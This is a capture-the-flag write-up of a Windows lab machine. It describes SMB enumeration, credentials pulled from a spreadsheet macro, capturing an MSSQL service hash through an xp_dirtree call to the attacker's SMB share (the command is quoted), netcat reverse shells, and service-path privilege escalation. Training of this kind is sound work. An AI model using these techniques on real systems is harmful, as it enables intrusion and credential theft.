My Attempt
User.txt
Enumeration
From my Nmap scan, I have discovered the following ports
Firstly I tried to login to the MSSQL service using the username "sa" and a couple of common passwords (sa, admin, password etc.). Unfortunately these common credentials cannot login to the service. I also tried to research on exploits based on the MSSQL version but also no luck there.
Then I started to enumerate the SMB with smbclient. This is where I made my mistake and got stuck.
The mistake I made was that I tried to access the SMB share with a null session (-U "" -N) which will not show any shares on the server. From here I thought that maybe the server is vulnerable to the Eternel Blue (MS17-010) exploit as a SMB null session is allowed. But with the Metasploit auxiliary module it proves that I am wrong.
Following Writeup
In the walkthrough video from the TCM Security course, the tutor was able to list share folders on the SMB service. It seems that the share files were accessible when providing an empty password. By using smbclient myself, I was able to find an uncommon share folder "Reporting".
Stored Credentials in Spreadsheet
Inside the Reports share folder, there is an Excel spreadsheet in it.
I tried to open the spreadsheet through the Libre Office Suite, but there seems to be no content in the spreadsheet.
Following the walkthrough video, I used the binwalk command to list and extract files inside the spreadsheet.
From the extracted files, there seems to be a .bin file that relates to some VBA script.
I used the strings command to list the content inside the bin file and there are some credentials found. Seems like the credentials "reporting:PcwTWTHRwryjc$c6" could be used to connect to the database service.
Using the credentials, I was able to login to the MSSQL server as the user "reporting"
Escalating Privilege to MSSQL Service Account
Although I logged into the SQL server, I don't have the privilege to enable the xp_cmdshell to execute system commands.
From the walkthrough video, it is suggested that we can use the xp_dirtree command to grab the NTLMv2 hash of the MSSQL service account. The first step is to host a simple SMB service on my own machine using smbserver.py from Impacket.
Then from the MSSQL terminal issue the command "EXEC master.sys.xp_dirtree '\\10.10.14.9\share',1,1" to connect to my SMB share.
From the smbserver.py terminal, we obtained the NTLMv2 hash of the mssql_svc account.
Then I saved the hash and cracked it using John the Ripper. The result shows the clear text password of the hash which is "corporate568".
Using the credentials "mssql-svc:corporate568" I am able to login to the SQL service and enable xp_cmdshell. Now I can execute arbritary commands.
Reverse Shell with Netcat
There are multiple ways to obtain a reverse shell by command execution. Here I choose to use netcat to create a reverse shell from the server.
First I uploaded the nc.exe file to the server. I hosted a simple HTTP server using python and then downloaded the file from the MSSQL client terminal.
Then I set up a listener on my machine and issue the netcat command to obtain a reverse shell.
The user.txt file is found on the desktop of the mssql-svc user.
Root.txt
Scanning Vulnerability (Following Writeup)
At first I tried to use Winpeas to scan for vulnerabilities. But the result does not seem to help. From the walkthrough video, the PowerUp.ps1 script is used to discover a vulnerability.
When I used the powershell script, my result seems to be a bit different from the video. This might be that the video is using an older version of the script. From my results, the first obvious discovery is the password of the Administrator account.
From the Nmap scan in the beginning, port 5985 is open which is a common port for Windows Remote Management. This sugguests that I might be able to remotely login using these credentials. I have used the evil-winrm and successfully login to the server as administrator.
The root.txt file can be found on the administrator's desktop.
Other Path for Privilege Escalation
In the video, the PE method used is to change the binpath configuration of a service and restart the service to obtain another reverse shell with administrator privilege. From my script, the vulnerable service is shown as below.
To obtain a reverse shell, we can first change the binpath configuration of that service. Before doing so, the original configuration is shown.
Now we should change the binary path name to a reverse shell command using nc.exe. Then we verify that the configuration is changed successfully.
With another listener set up on the kali machine (port 4444), we can obtain the reverse shell by restarting the service.
Last updated